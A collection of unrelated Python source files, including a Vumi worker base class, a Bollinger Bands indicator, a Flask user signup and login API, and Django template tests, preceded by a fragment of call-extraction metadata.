'help_text': '"""Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email"""'}), "(default=0, help_text=\n 'Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email'\n )\n", (4399, 4536), False, 'from django.db import models\n'), ((4538, 4765), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': '""""""', 'help_text': '"""Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt"""'}), '(blank=True, default=\'\', help_text=\n \'Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt\'\n )\n', (4554, 4765), False, 'from django.db import models\n'), ((5112, 5170), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""EventQuestion"""'], {'related_name': '"""options"""'}), "('EventQuestion', related_name='options')\n", (5129, 5170), False, 'from django.db import models\n'), ((5182, 5214), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (5198, 5214), False, 'from django.db import models\n'), ((5227, 5281), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'help_text': '"""Eurocenten"""', 'default': '(0)'}), "(help_text='Eurocenten', default=0)\n", (5246, 5281), False, 'from django.db import models\n'), ((5295, 5328), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (5314, 5328), False, 'from django.db import models\n'), ((5341, 5371), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (5360, 5371), False, 'from django.db import models\n'), ((5384, 5477), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'help_text': '"""Aantal beschikbare plekken (0 = geen limiet)"""'}), "(default=0, help_text=\n 'Aantal beschikbare plekken (0 = geen limiet)')\n", (5403, 5477), False, 'from django.db import models\n'), ((6961, 7000), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (6981, 7000), False, 'from django.db import models\n'), ((7018, 7049), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (7034, 7049), False, 'from django.db import models\n'), ((7066, 7097), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (7082, 7097), False, 'from django.db import models\n'), ((7110, 7139), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)'}), '(blank=True)\n', (7127, 7139), False, 'from django.db import models\n'), ((7152, 7206), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Event'], {'related_name': '"""registrations"""'}), "(Event, related_name='registrations')\n", (7169, 7206), False, 'from django.db import models\n'), ((7219, 7249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7238, 7249), False, 'from django.db import models\n'), ((7261, 7295), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (7280, 7295), False, 'from django.db import models\n'), ((7309, 7364), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'default': '""""""', 'blank': '(True)'}), "(max_length=64, default='', blank=True)\n", (7325, 7364), False, 'from django.db import models\n'), ((7377, 7433), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'default': '""""""', 'blank': '(True)'}), "(max_length=128, default='', blank=True)\n", (7393, 7433), False, 'from django.db import models\n'), ((9707, 9762), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Registration'], {'related_name': '"""answers"""'}), "(Registration, related_name='answers')\n", (9724, 9762), False, 'from django.db import models\n'), ((9778, 9810), 'django.db.models.ForeignKey', 'models.ForeignKey', (['EventQuestion'], {}), '(EventQuestion)\n', (9795, 9810), False, 'from django.db import models\n'), ((9827, 9868), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'null': '(True)'}), '(default=0, null=True)\n', (9846, 9868), False, 'from django.db import models\n'), ((9885, 9929), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(256)', 'blank': '(True)'}), '(max_length=256, blank=True)\n', (9901, 9929), False, 'from django.db import models\n'), ((9947, 9981), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (9966, 9981), False, 'from django.db import models\n'), ((9995, 10062), 'django.db.models.ForeignKey', 'models.ForeignKey', (['EventOption'], {'default': 'None', 'null': '(True)', 'blank': '(True)'}), '(EventOption, default=None, null=True, blank=True)\n', (10012, 10062), False, 'from django.db import models\n'), ((3103, 3126), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3124, 3126), False, 'import datetime\n'), ((8923, 8958), 'django.template.Template', 'Template', (['self.event.email_template'], {}), '(self.event.email_template)\n', (8931, 8958), False, 'from django.template import Context, Template\n'), ((9184, 9329), 'django.core.mail.EmailMessage', 'EmailMessage', ([], {'subject': "('Inschrijfbevestiging: %s' % self.event.name)", 'body': 'rendered_mail', 'from_email': 'self.event.contact_email', 'to': '[self.email]'}), "(subject='Inschrijfbevestiging: %s' % self.event.name, body=\n rendered_mail, from_email=self.event.contact_email, to=[self.email])\n", (9196, 9329), False, 'from django.core.mail import EmailMessage\n'), ((9542, 9564), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9562, 9564), False, 'import traceback\n')] |
# -*- test-case-name: vumi.tests.test_worker -*-
"""Basic tools for workers that handle TransportMessages."""
import time
import os
import socket
from twisted.internet.defer import (
inlineCallbacks, succeed, maybeDeferred, gatherResults)
from twisted.python import log
from vumi.service import Worker
from vumi.middleware import setup_middlewares_from_config
from vumi.connectors import ReceiveInboundConnector, ReceiveOutboundConnector
from vumi.config import Config, ConfigInt
from vumi.errors import DuplicateConnectorError
from vumi.utils import generate_worker_id
from vumi.blinkenlights.heartbeat import (HeartBeatPublisher,
HeartBeatMessage)
def then_call(d, func, *args, **kw):
return d.addCallback(lambda r: func(*args, **kw))
class BaseConfig(Config):
"""Base config definition for workers.
You should subclass this and add worker-specific fields.
"""
amqp_prefetch_count = ConfigInt(
"The number of messages fetched concurrently from each AMQP queue"
" by each worker instance.",
default=20, static=True)
class BaseWorker(Worker):
"""Base class for a message processing worker.
This contains common functionality used by application, transport and
dispatcher workers. It should be subclassed by workers that need to
manage their own connectors.
"""
CONFIG_CLASS = BaseConfig
def __init__(self, options, config=None):
super(BaseWorker, self).__init__(options, config=config)
self.connectors = {}
self.middlewares = []
self._static_config = self.CONFIG_CLASS(self.config, static=True)
self._hb_pub = None
self._worker_id = None
def startWorker(self):
log.msg('Starting a %s worker with config: %s'
% (self.__class__.__name__, self.config))
d = maybeDeferred(self._validate_config)
then_call(d, self.setup_heartbeat)
then_call(d, self.setup_middleware)
then_call(d, self.setup_connectors)
then_call(d, self.setup_worker)
return d
def stopWorker(self):
log.msg('Stopping a %s worker.' % (self.__class__.__name__,))
d = succeed(None)
then_call(d, self.teardown_worker)
then_call(d, self.teardown_connectors)
then_call(d, self.teardown_middleware)
then_call(d, self.teardown_heartbeat)
return d
def setup_connectors(self):
raise NotImplementedError()
@inlineCallbacks
def setup_heartbeat(self):
# Disable heartbeats if worker_name is not set. We're
# currently using it as the primary identifier for a worker
if 'worker_name' in self.config:
self._worker_name = self.config.get("worker_name")
self._system_id = self.options.get("system-id", "global")
self._worker_id = generate_worker_id(self._system_id,
self._worker_name)
log.msg("Starting HeartBeat publisher with worker_name=%s"
% self._worker_name)
self._hb_pub = yield self.start_publisher(HeartBeatPublisher,
self._gen_heartbeat_attrs)
else:
log.msg("HeartBeat publisher disabled. No worker_id "
"field found in config.")
def teardown_heartbeat(self):
if self._hb_pub is not None:
self._hb_pub.stop()
self._hb_pub = None
def _gen_heartbeat_attrs(self):
# worker_name is guaranteed to be set here, otherwise this func would
# not have been called
attrs = {
'version': HeartBeatMessage.VERSION_20130319,
'worker_id': self._worker_id,
'system_id': self._system_id,
'worker_name': self._worker_name,
'hostname': socket.gethostname(),
'timestamp': time.time(),
'pid': os.getpid(),
}
attrs.update(self.custom_heartbeat_attrs())
return attrs
def custom_heartbeat_attrs(self):
"""Worker subclasses can override this to add custom attributes"""
return {}
def teardown_connectors(self):
d = succeed(None)
for connector_name in self.connectors.keys():
then_call(d, self.teardown_connector, connector_name)
return d
def setup_worker(self):
raise NotImplementedError()
def teardown_worker(self):
raise NotImplementedError()
def setup_middleware(self):
"""Create middlewares from config."""
d = setup_middlewares_from_config(self, self.config)
d.addCallback(self.middlewares.extend)
return d
def teardown_middleware(self):
"""Teardown middlewares."""
d = succeed(None)
for mw in reversed(self.middlewares):
then_call(d, mw.teardown_middleware)
return d
def get_static_config(self):
"""Return static (message independent) configuration."""
return self._static_config
def get_config(self, msg, ctxt=None):
"""This should return a message and context specific config object.
It deliberately returns a deferred even when this isn't strictly
necessary to ensure that workers will continue to work when per-message
configuration needs to be fetched from elsewhere.
"""
return succeed(self.CONFIG_CLASS(self.config))
def _validate_config(self):
"""Once subclasses call `super().validate_config` properly,
this method can be removed.
"""
# TODO: remove this once all uses of validate_config have been fixed.
self.validate_config()
def validate_config(self):
"""
Application-specific config validation happens in here.
Subclasses may override this method to perform extra config
validation.
"""
# TODO: deprecate this in favour of a similar method on
# config classes.
pass
def setup_connector(self, connector_cls, connector_name, middleware=False):
if connector_name in self.connectors:
raise DuplicateConnectorError("Attempt to add duplicate connector"
" with name %r" % (connector_name,))
prefetch_count = self.get_static_config().amqp_prefetch_count
middlewares = self.middlewares if middleware else None
connector = connector_cls(self, connector_name,
prefetch_count=prefetch_count,
middlewares=middlewares)
self.connectors[connector_name] = connector
d = connector.setup()
d.addCallback(lambda r: connector)
return d
def teardown_connector(self, connector_name):
connector = self.connectors.pop(connector_name)
d = connector.teardown()
d.addCallback(lambda r: connector)
return d
def setup_ri_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveInboundConnector, connector_name,
middleware=middleware)
def setup_ro_connector(self, connector_name, middleware=True):
return self.setup_connector(ReceiveOutboundConnector, connector_name,
middleware=middleware)
def pause_connectors(self):
return gatherResults([
connector.pause() for connector in self.connectors.itervalues()])
def unpause_connectors(self):
for connector in self.connectors.itervalues():
connector.unpause()
| [
"twisted.python.log.msg",
"twisted.internet.defer.maybeDeferred",
"vumi.config.ConfigInt",
"vumi.middleware.setup_middlewares_from_config",
"vumi.errors.DuplicateConnectorError",
"vumi.utils.generate_worker_id",
"time.time",
"os.getpid",
"socket.gethostname",
"twisted.internet.defer.succeed"
] | [((961, 1098), 'vumi.config.ConfigInt', 'ConfigInt', (['"""The number of messages fetched concurrently from each AMQP queue by each worker instance."""'], {'default': '(20)', 'static': '(True)'}), "(\n 'The number of messages fetched concurrently from each AMQP queue by each worker instance.'\n , default=20, static=True)\n", (970, 1098), False, 'from vumi.config import Config, ConfigInt\n'), ((1755, 1847), 'twisted.python.log.msg', 'log.msg', (["('Starting a %s worker with config: %s' % (self.__class__.__name__, self.\n config))"], {}), "('Starting a %s worker with config: %s' % (self.__class__.__name__,\n self.config))\n", (1762, 1847), False, 'from twisted.python import log\n'), ((1872, 1908), 'twisted.internet.defer.maybeDeferred', 'maybeDeferred', (['self._validate_config'], {}), '(self._validate_config)\n', (1885, 1908), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((2132, 2193), 'twisted.python.log.msg', 'log.msg', (["('Stopping a %s worker.' % (self.__class__.__name__,))"], {}), "('Stopping a %s worker.' % (self.__class__.__name__,))\n", (2139, 2193), False, 'from twisted.python import log\n'), ((2206, 2219), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (2213, 2219), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((4234, 4247), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (4241, 4247), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((4609, 4657), 'vumi.middleware.setup_middlewares_from_config', 'setup_middlewares_from_config', (['self', 'self.config'], {}), '(self, self.config)\n', (4638, 4657), False, 'from vumi.middleware import setup_middlewares_from_config\n'), ((4806, 4819), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (4813, 4819), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((2876, 2930), 'vumi.utils.generate_worker_id', 'generate_worker_id', (['self._system_id', 'self._worker_name'], {}), '(self._system_id, self._worker_name)\n', (2894, 2930), False, 'from vumi.utils import generate_worker_id\n'), ((2992, 3071), 'twisted.python.log.msg', 'log.msg', (["('Starting HeartBeat publisher with worker_name=%s' % self._worker_name)"], {}), "('Starting HeartBeat publisher with worker_name=%s' % self._worker_name)\n", (2999, 3071), False, 'from twisted.python import log\n'), ((3267, 3343), 'twisted.python.log.msg', 'log.msg', (['"""HeartBeat publisher disabled. No worker_id field found in config."""'], {}), "('HeartBeat publisher disabled. No worker_id field found in config.')\n", (3274, 3343), False, 'from twisted.python import log\n'), ((3879, 3899), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (3897, 3899), False, 'import socket\n'), ((3926, 3937), 'time.time', 'time.time', ([], {}), '()\n', (3935, 3937), False, 'import time\n'), ((3958, 3969), 'os.getpid', 'os.getpid', ([], {}), '()\n', (3967, 3969), False, 'import os\n'), ((6191, 6289), 'vumi.errors.DuplicateConnectorError', 'DuplicateConnectorError', (["('Attempt to add duplicate connector with name %r' % (connector_name,))"], {}), "('Attempt to add duplicate connector with name %r' %\n (connector_name,))\n", (6214, 6289), False, 'from vumi.errors import DuplicateConnectorError\n')] |
# setup.py
# This script will build the main subpackages
# See LICENSE for details
from __future__ import print_function, absolute_import
from numpy.distutils.misc_util import Configuration
from os.path import join
TTFORT_DIR = '../tt-fort'
EXPM_DIR = '../tt-fort/expm'
EXPOKIT_SRC = [
'explib.f90',
'normest.f90',
'expokit.f',
'dlacn1.f',
'dlapst.f',
'dlarpc.f',
'zlacn1.f',
]
TTKSL_SRC = [
'ttals.f90',
'tt_ksl.f90',
'tt_diag_ksl.f90'
]
def configuration(parent_package='', top_path=None):
expokit_src = [join(EXPM_DIR, x) for x in EXPOKIT_SRC]
ttksl_src = [join(TTFORT_DIR, x) for x in TTKSL_SRC]
ttksl_src.append('tt_ksl.pyf')
config = Configuration('ksl', parent_package, top_path)
config.add_library(
'expokit',
sources=expokit_src,
)
config.add_extension(
'dyn_tt',
sources=ttksl_src,
depends=[
'print_lib',
'expokit',
'mytt',
],
libraries=[
'print_lib',
'expokit',
'mytt',
],
)
return config
if __name__ == '__main__':
print('This is the wrong setup.py to run')
| [
"os.path.join",
"numpy.distutils.misc_util.Configuration"
] | [((711, 757), 'numpy.distutils.misc_util.Configuration', 'Configuration', (['"""ksl"""', 'parent_package', 'top_path'], {}), "('ksl', parent_package, top_path)\n", (724, 757), False, 'from numpy.distutils.misc_util import Configuration\n'), ((564, 581), 'os.path.join', 'join', (['EXPM_DIR', 'x'], {}), '(EXPM_DIR, x)\n', (568, 581), False, 'from os.path import join\n'), ((622, 641), 'os.path.join', 'join', (['TTFORT_DIR', 'x'], {}), '(TTFORT_DIR, x)\n', (626, 641), False, 'from os.path import join\n')] |
from NekoGram import Neko, Bot
import json
def test_json_text_processor():
neko = Neko(bot=Bot(token='0:0', validate_token=False), validate_text_names=False)
raw_json = '{"x": {"text": "hello"} }'
neko.add_texts(texts=raw_json, lang='en')
assert neko.texts['en'] == json.loads(raw_json)
| [
"NekoGram.Bot",
"json.loads"
] | [((284, 304), 'json.loads', 'json.loads', (['raw_json'], {}), '(raw_json)\n', (294, 304), False, 'import json\n'), ((97, 135), 'NekoGram.Bot', 'Bot', ([], {'token': '"""0:0"""', 'validate_token': '(False)'}), "(token='0:0', validate_token=False)\n", (100, 135), False, 'from NekoGram import Neko, Bot\n')] |
from collections import namedtuple
import numpy as np
import talib
from jesse.indicators.ma import ma
from jesse.indicators.mean_ad import mean_ad
from jesse.indicators.median_ad import median_ad
from jesse.helpers import get_candle_source, slice_candles
BollingerBands = namedtuple('BollingerBands', ['upperband', 'middleband', 'lowerband'])
def bollinger_bands(candles: np.ndarray, period: int = 20, devup: float = 2, devdn: float = 2, matype: int = 0, devtype: int = 0,
source_type: str = "close",
sequential: bool = False) -> BollingerBands:
"""
BBANDS - Bollinger Bands
:param candles: np.ndarray
:param period: int - default: 20
:param devup: float - default: 2
:param devdn: float - default: 2
:param matype: int - default: 0
:param devtype: int - default: 0
:param source_type: str - default: "close"
:param sequential: bool - default=False
:return: BollingerBands(upperband, middleband, lowerband)
"""
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
if devtype == 0:
dev = talib.STDDEV(source, period)
elif devtype == 1:
dev = mean_ad(source, period, sequential=True)
elif devtype == 2:
dev = median_ad(source, period, sequential=True)
middlebands = ma(source, period=period, matype=matype, sequential=True)
upperbands = middlebands + devup * dev
lowerbands = middlebands - devdn * dev
if sequential:
return BollingerBands(upperbands, middlebands, lowerbands)
else:
return BollingerBands(upperbands[-1], middlebands[-1], lowerbands[-1])
| [
"talib.STDDEV",
"collections.namedtuple",
"jesse.indicators.ma.ma",
"jesse.indicators.mean_ad.mean_ad",
"jesse.indicators.median_ad.median_ad",
"jesse.helpers.slice_candles",
"jesse.helpers.get_candle_source"
] | [((275, 345), 'collections.namedtuple', 'namedtuple', (['"""BollingerBands"""', "['upperband', 'middleband', 'lowerband']"], {}), "('BollingerBands', ['upperband', 'middleband', 'lowerband'])\n", (285, 345), False, 'from collections import namedtuple\n'), ((1020, 1054), 'jesse.helpers.slice_candles', 'slice_candles', (['candles', 'sequential'], {}), '(candles, sequential)\n', (1033, 1054), False, 'from jesse.helpers import get_candle_source, slice_candles\n'), ((1069, 1120), 'jesse.helpers.get_candle_source', 'get_candle_source', (['candles'], {'source_type': 'source_type'}), '(candles, source_type=source_type)\n', (1086, 1120), False, 'from jesse.helpers import get_candle_source, slice_candles\n'), ((1360, 1417), 'jesse.indicators.ma.ma', 'ma', (['source'], {'period': 'period', 'matype': 'matype', 'sequential': '(True)'}), '(source, period=period, matype=matype, sequential=True)\n', (1362, 1417), False, 'from jesse.indicators.ma import ma\n'), ((1156, 1184), 'talib.STDDEV', 'talib.STDDEV', (['source', 'period'], {}), '(source, period)\n', (1168, 1184), False, 'import talib\n'), ((1221, 1261), 'jesse.indicators.mean_ad.mean_ad', 'mean_ad', (['source', 'period'], {'sequential': '(True)'}), '(source, period, sequential=True)\n', (1228, 1261), False, 'from jesse.indicators.mean_ad import mean_ad\n'), ((1298, 1340), 'jesse.indicators.median_ad.median_ad', 'median_ad', (['source', 'period'], {'sequential': '(True)'}), '(source, period, sequential=True)\n', (1307, 1340), False, 'from jesse.indicators.median_ad import median_ad\n')] |
""" Global Flask Application Settings """
import os
from app import app
class Config(object):
DEBUG = False
TESTING = False
PRODUCTION = False
class Development(Config):
MODE = 'Development'
DEBUG = True
class Production(Config):
MODE = 'Production'
DEBUG = False
PRODUCTION = True
# Set FLASK_CONFIG env to 'Production' or 'Development' to set Config
flask_config = os.environ.get('FLASK_CONFIG', 'Development')
app.config.from_object('app.config.{}'.format(flask_config))
| [
"os.environ.get"
] | [((408, 453), 'os.environ.get', 'os.environ.get', (['"""FLASK_CONFIG"""', '"""Development"""'], {}), "('FLASK_CONFIG', 'Development')\n", (422, 453), False, 'import os\n')] |
from flask import Blueprint, jsonify, make_response
from flask_restful import Resource, Api, reqparse, inputs
from ..models.decorators import admin_required
from ..models.models import UserModel
import os
class SignUp(Resource):
def __init__(self):
"""
Validates both json and form-data input
"""
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'username',
required=True,
help='kindly provide a valid username',
type=inputs.regex(r"(.*\S.*)"),
location=['form', 'json'])
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
self.reqparse.add_argument(
'confirm_password',
required=True,
trim=True,
help='kindly provide a valid confirmation password',
location=['form', 'json'])
super(SignUp, self).__init__()
def post(self):
"""
Register a new user
"""
kwargs = self.reqparse.parse_args()
username = kwargs.get('username')
email = kwargs.get('email')
password = kwargs.get('password')
confirm_password = kwargs.get('confirm_password')
username_exist = UserModel.get_one('users', username=username)
if username_exist:
return make_response(jsonify({'message': 'username already taken'}), 400)
if password == confirm_password:
if len(password) >= 8:
email_exists = UserModel.get_one('users', email=email)
if not email_exists:
if username == os.getenv('ADMIN'):
user = UserModel(username=username, email=email, password=password)
user.create_user()
fetch_admin = UserModel.get_one('users', username=username)
data = {'admin': True}
UserModel.update('users', id=fetch_admin[0], data=data)
user = UserModel.get_one('users', id=fetch_admin[0])
return jsonify({'admin': UserModel.user_details(user)})
user = UserModel(username=username, email=email, password=password)
user.create_user()
user = UserModel.get_one('users', username=username)
return make_response(jsonify({'message': 'successfully registered', 'user': UserModel.user_details(user)}), 201)
return make_response(jsonify({'message': 'email already taken'}), 203)
return make_response(jsonify({'message': 'password should be atleast 8 characters'}), 400)
return make_response(jsonify({"message" : "password and confirm password should be identical"}), 400)
class AllUsers(Resource):
@admin_required
def get(self):
users = UserModel.get_all('users')
if not users:
return jsonify({'message': 'no users found yet'})
return make_response(jsonify({'all_users': [UserModel.user_details(user) for user in users]}))
class PromoteUser(Resource):
@admin_required
def put(self, user_id):
user = UserModel.get_one('users', id=user_id)
if not user:
return jsonify({'message': 'user not found'})
data = {'admin': True}
UserModel.update('users', id=user[0], data=data)
user = UserModel.get_one('users', id=user_id)
return jsonify({'user': UserModel.user_details(user)})
class Login(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument(
'email',
required=True,
help='kindly provide a valid email address',
location=['form', 'json'],
type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
self.reqparse.add_argument(
'password',
required=True,
trim=True,
help='kindly provide a valid password',
location=['form', 'json'])
super(Login, self).__init__()
def post(self):
kwargs = self.reqparse.parse_args()
email = kwargs.get('email')
password = kwargs.get('password')
user = UserModel.get_one('users', email=email)
if user is None:
return make_response(jsonify({'message': 'invalid email or password'}), 404)
if UserModel.validate_password(password=password, email=user[2]):
token = UserModel.generate_token(user)
return make_response(jsonify({'message': 'you are successfully logged in', 'token': token}), 200)
return make_response(jsonify({'message': 'invalid email or password'}), 401)
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
api.add_resource(SignUp, '/auth/signup', endpoint='signup')
api.add_resource(AllUsers, '/users')
api.add_resource(PromoteUser, '/users/<int:user_id>')
api.add_resource(Login, '/auth/login', endpoint='login')
| [
"flask_restful.reqparse.RequestParser",
"os.getenv",
"flask_restful.Api",
"flask_restful.inputs.regex",
"flask.Blueprint",
"flask.jsonify"
] | [((5152, 5190), 'flask.Blueprint', 'Blueprint', (['"""resources.users"""', '__name__'], {}), "('resources.users', __name__)\n", (5161, 5190), False, 'from flask import Blueprint, jsonify, make_response\n'), ((5197, 5211), 'flask_restful.Api', 'Api', (['users_api'], {}), '(users_api)\n', (5200, 5211), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((351, 375), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (373, 375), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((3972, 3996), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (3994, 3996), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((3100, 3173), 'flask.jsonify', 'jsonify', (["{'message': 'password and confirm password should be identical'}"], {}), "({'message': 'password and confirm password should be identical'})\n", (3107, 3173), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3333, 3375), 'flask.jsonify', 'jsonify', (["{'message': 'no users found yet'}"], {}), "({'message': 'no users found yet'})\n", (3340, 3375), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3654, 3692), 'flask.jsonify', 'jsonify', (["{'message': 'user not found'}"], {}), "({'message': 'user not found'})\n", (3661, 3692), False, 'from flask import Blueprint, jsonify, make_response\n'), ((5081, 5130), 'flask.jsonify', 'jsonify', (["{'message': 'invalid email or password'}"], {}), "({'message': 'invalid email or password'})\n", (5088, 5130), False, 'from flask import Blueprint, jsonify, make_response\n'), ((532, 557), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(.*\\\\S.*)"""'], {}), "('(.*\\\\S.*)')\n", (544, 557), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((795, 862), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)"""'], {}), "('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n", (807, 862), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((1753, 1799), 'flask.jsonify', 'jsonify', (["{'message': 'username already taken'}"], {}), "({'message': 'username already taken'})\n", (1760, 1799), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3001, 3064), 'flask.jsonify', 'jsonify', (["{'message': 'password should be atleast 8 characters'}"], {}), "({'message': 'password should be atleast 8 characters'})\n", (3008, 3064), False, 'from flask import Blueprint, jsonify, make_response\n'), ((4194, 4261), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)"""'], {}), "('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n", (4206, 4261), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((4760, 4809), 'flask.jsonify', 'jsonify', (["{'message': 'invalid email or password'}"], {}), "({'message': 'invalid email or password'})\n", (4767, 4809), False, 'from flask import Blueprint, jsonify, make_response\n'), ((4975, 5045), 'flask.jsonify', 'jsonify', (["{'message': 'you are successfully logged in', 'token': token}"], {}), "({'message': 'you are successfully logged in', 'token': token})\n", (4982, 5045), False, 'from flask import Blueprint, jsonify, make_response\n'), ((2918, 2961), 'flask.jsonify', 'jsonify', (["{'message': 'email already taken'}"], {}), "({'message': 'email already taken'})\n", (2925, 2961), False, 'from flask import Blueprint, jsonify, make_response\n'), ((2025, 2043), 'os.getenv', 'os.getenv', (['"""ADMIN"""'], {}), "('ADMIN')\n", (2034, 2043), False, 'import os\n')] |
"""
Test the model blocks
"""
import datetime
from django.test import TestCase
from mock import Mock
from django.db.models import Model, IntegerField, DateTimeField, CharField
from django.template import Context, Template, TemplateSyntaxError
from example_project.pepulator_factory.models import Pepulator, Distributor
from model_blocks.templatetags import model_filters
from model_blocks.templatetags import model_nodes
class DetailBlockFilterTest (TestCase):
fixtures = ['pepulator_factory_data.json']
def setUp(self):
# Mock Django's get_template so that it doesn't load a real file;
# instead just return a template that allows us to verify the context
model_nodes.get_template = Mock(
return_value=Template(('{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
'{% for name, label, value, is_list, is_link in fields %}'
'{{ name|safe }},'
'{{ label|safe }},'
'{% if not is_list %}'
'{% if is_link %}'
'@{{ value }}'
'{% else %}'
'{{ value|safe }}'
'{% endif %}'
'{% else %}'
'[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
'{% endif %},'
'{% endfor %}')))
def test_model_format(self):
"""Tests that a given model is formatted as expected."""
pepulator = Pepulator.objects.get(serial_number=1235)
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = model_filters.as_detail_block(pepulator)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_filter_is_registered(self):
"""Test that the filter can be used from within a template"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"Pepulator #1235:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_title_is_used(self):
"""Test that a title is used if provided"""
template = Template(('{% load model_filters %}'
'{{ pepulator|as_detail_block:"My Pepulator" }}'))
pepulator = Pepulator.objects.get(serial_number=1235)
context = Context({'pepulator':pepulator})
expected_detail = (u"My Pepulator:pepulator,"
"serial_number,serial number,1235,"
"height,height,12,"
"width,width,15,"
"manufacture_date,manufacture date,2011-06-10 11:12:33,"
"color,color,red,"
"address,address,@ppr://1235/,"
"distributed_by,distributed by,Walmart,"
"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
"jambs,jambs,[],"
)
detail = template.render(context)
model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
self.assertEqual(detail, expected_detail)
def test_related_fields(self):
